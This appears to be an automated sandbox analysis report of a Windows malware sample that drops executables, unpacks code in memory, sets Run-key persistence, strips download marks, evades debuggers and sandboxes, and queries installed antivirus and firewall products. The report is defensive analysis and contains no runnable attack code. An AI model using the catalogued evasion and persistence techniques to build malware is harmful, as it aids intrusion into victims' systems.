      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp

      Data Obfuscation

      barindex
      Detected unpacking (creates a PE file in dynamic memory)
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeUnpacked PE file: 2.2.tchnhwrvi.exe.3330000.5.unpack
      .NET source code contains potential unpacker
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00283D95 push ecx; ret 1_2_00283DA8
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00283D95 push ecx; ret 2_2_00283DA8
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0040D2E1 push ecx; ret 2_2_0040D2F4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028A192 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0028A192
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeFile created: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeJump to dropped file
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeFile created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rorscojuxnJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run rorscojuxnJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeFile opened: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-8693
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe TID: 6068Thread sleep time: -7378697629483816s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-7410
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWindow / User API: threadDelayed 8834Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWindow / User API: foregroundWindowGot 885Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWindow / User API: foregroundWindowGot 785Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeAPI coverage: 4.0 %
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F0EBF GetSystemInfo,1_2_005F0EBF
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeAPI call chain: ExitProcess graph end nodegraph_1-7347
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeAPI call chain: ExitProcess graph end nodegraph_2-28796
      Source: tchnhwrvi.exe, 00000002.00000002.564994074.000000000160B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00283B2B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00283B2B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028A192 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0028A192
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00282200 lstrlenW,SendMessageW,SendMessageW,GetWindowTextLengthW,GetProcessHeap,HeapAlloc,GetWindowTextW,SendMessageW,GetProcessHeap,GetProcessHeap,HeapFree,SendMessageW,SendMessageW,GetWindowTextLengthW,GetProcessHeap,HeapAlloc,SendMessageW,1_2_00282200
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F005F mov eax, dword ptr fs:[00000030h]1_2_005F005F
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F017B mov eax, dword ptr fs:[00000030h]1_2_005F017B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F0109 mov eax, dword ptr fs:[00000030h]1_2_005F0109
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F013E mov eax, dword ptr fs:[00000030h]1_2_005F013E
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00283B2B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00283B2B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00285D3D SetUnhandledExceptionFilter,1_2_00285D3D
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_002879C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_002879C4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00283B2B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00283B2B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00285D3D SetUnhandledExceptionFilter,2_2_00285D3D
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_002879C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002879C4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00401E16 SetUnhandledExceptionFilter,2_2_00401E16
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C83
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004060A4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F2A

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Maps a DLL or memory area into another process
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeJump to behavior
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.0000000003954000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000039CF000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000034FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: tchnhwrvi.exe, 00000002.00000002.571114508.00000000067DB000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Managerram Managerp
      Source: tchnhwrvi.exe, 00000002.00000002.571585442.000000000722C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Managerram Manager
      Source: tchnhwrvi.exe, 00000002.00000002.571150741.000000000691A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Managerp
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000034FE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.000000000389C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000037C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerX
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert
      Source: tchnhwrvi.exe, 00000002.00000002.572120377.0000000007AEC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager?
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0040207B cpuid 2_2_0040207B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_00286BEA GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00286BEA
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
